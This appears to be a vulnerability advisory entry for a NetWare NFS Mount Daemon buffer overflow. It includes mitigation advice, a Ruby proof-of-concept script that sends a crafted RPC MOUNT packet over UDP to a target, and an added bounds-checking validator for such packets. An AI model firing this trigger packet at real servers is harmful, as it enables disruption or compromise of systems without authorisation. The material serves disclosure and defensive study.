NetWare NFS Mount Daemon Remote Buffer Overflow
Vendor: NetWare
By: Protek Research Lab
CVSS: 7.5 (HIGH)
CWE: 119
Product Name: NetWare
Affected Version From: NetWare prior to 6.5 SP8
Affected Version To: NetWare prior to 6.5 SP8
Patch Exists: YES
Related CWE: CVE-2011-1890
CPE: o:novell:netware
Metasploit: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2011

PRL-2011-04

This is a remote buffer overflow vulnerability in the NetWare NFS Mount Daemon. An attacker can send a specially crafted packet to the target port to execute arbitrary code on the target system. The vulnerability was discovered by Protek Research Lab in 2011 and affects versions of NetWare prior to 6.5 SP8.

Mitigation:

Upgrade to NetWare 6.5 SP8 or later.
Source

Exploit-DB raw data:

#!/usr/bin/ruby

# Source:
# http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=24&Itemid=24

require 'socket'

netware_server = (ARGV[0])
target_port = (ARGV[1] || 1234)


beepbeep=
"\x1c\xd1\xef\xab" + # XID
"\x00\x00\x00\x00" + # Message Type: Call (0)
"\x00\x00\x00\x02" + # RPC Version: 2
"\x00\x01\x86\xa5" + # Program: 100005 MOUNT
"\x00\x00\x00\x02" + # Program Version: 2
"\x00\x00\x00\x01" + # Procedure: MNT (1)
"\x00\x00\x00\x00\x00\x00\x00\x00" + # Credentials NULL
"\x00\x00\x00\x00\x00\x00\x00\x00" + # Verifier NULL
"\x41\x42\x43\x44"




puts "[+] beep beep\n"
puts "[+]No, it's not the road runner\n"


if (!(netware_server && target_port))
    puts "Usage: PRL-2011-04.rb host port (default port: 1234)\n"
    exit
else
    puts "[+]Sending UDP Packet...\n"
    sock = UDPSocket.open
    sock.connect(netware_server, target_port.to_i)
    sock.send(beepbeep, 0)
end
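
A defensive check for the request type the PoC above sends, as an added example that is not part of the original advisory or the Exploit-DB entry: it parses an ONC RPC call and rejects a MOUNT MNT request whose dirpath length field exceeds MNTPATHLEN or the bytes actually present in the datagram. The function names and sample datagrams are constructed for illustration; the page does not state the daemon's exact flaw, so treating the dirpath length as the field to validate is an assumption.

```ruby
# Added example: validate an ONC RPC MOUNT MNT call before its argument is used.
MOUNT_PROG    = 100_005  # MOUNT program number
PROC_MNT      = 1        # MNT procedure
MNTPATHLEN    = 1024     # dirpath limit in the MOUNT protocol definition
MAX_AUTH_BODY = 400      # opaque_auth body limit in ONC RPC

# Reads one opaque_auth (flavor, length, padded body); returns next offset or nil.
def skip_opaque_auth(buf, off)
  return nil if buf.bytesize < off + 8
  len = buf.byteslice(off + 4, 4).unpack1('N')
  nxt = off + 8 + ((len + 3) & ~3)
  len <= MAX_AUTH_BODY && nxt <= buf.bytesize ? nxt : nil
end

# Returns [:ok, path], [:ignored, reason] or [:malformed, reason].
def check_mnt_call(datagram)
  buf = datagram.b
  return [:malformed, 'short RPC header'] if buf.bytesize < 24
  _xid, mtype, rpcvers, prog, _vers, procnum = buf.unpack('N6')
  return [:ignored, 'not a MOUNT MNT call'] unless
    mtype == 0 && rpcvers == 2 && prog == MOUNT_PROG && procnum == PROC_MNT
  off = skip_opaque_auth(buf, 24)      # credentials
  off &&= skip_opaque_auth(buf, off)   # verifier
  return [:malformed, 'bad credential or verifier'] unless off
  return [:malformed, 'missing dirpath length'] if buf.bytesize < off + 4
  len = buf.byteslice(off, 4).unpack1('N')
  return [:malformed, "dirpath length #{len} exceeds MNTPATHLEN"] if len > MNTPATHLEN
  return [:malformed, "dirpath length #{len} exceeds datagram"] if off + 4 + len > buf.bytesize
  [:ok, buf.byteslice(off + 4, len)]
end

# Constructed sample datagrams (not captured traffic): AUTH_NULL header plus argument.
def mnt_call(arg)
  [0x1234, 0, 2, MOUNT_PROG, 2, PROC_MNT, 0, 0, 0, 0].pack('N10') + arg
end
GOOD      = mnt_call([12].pack('N') + '/export/home')
OVERSIZED = mnt_call([70_000].pack('N'))
TRUNCATED = mnt_call([64].pack('N') + '/export')

if __FILE__ == $PROGRAM_NAME
  [GOOD, OVERSIZED, TRUNCATED].each { |d| p check_mnt_call(d) }
end
```

The same two bounds checks (against the protocol maximum and against the received length) belong in any server-side decoder and can be mirrored in an IDS rule for UDP traffic to the mount daemon's port.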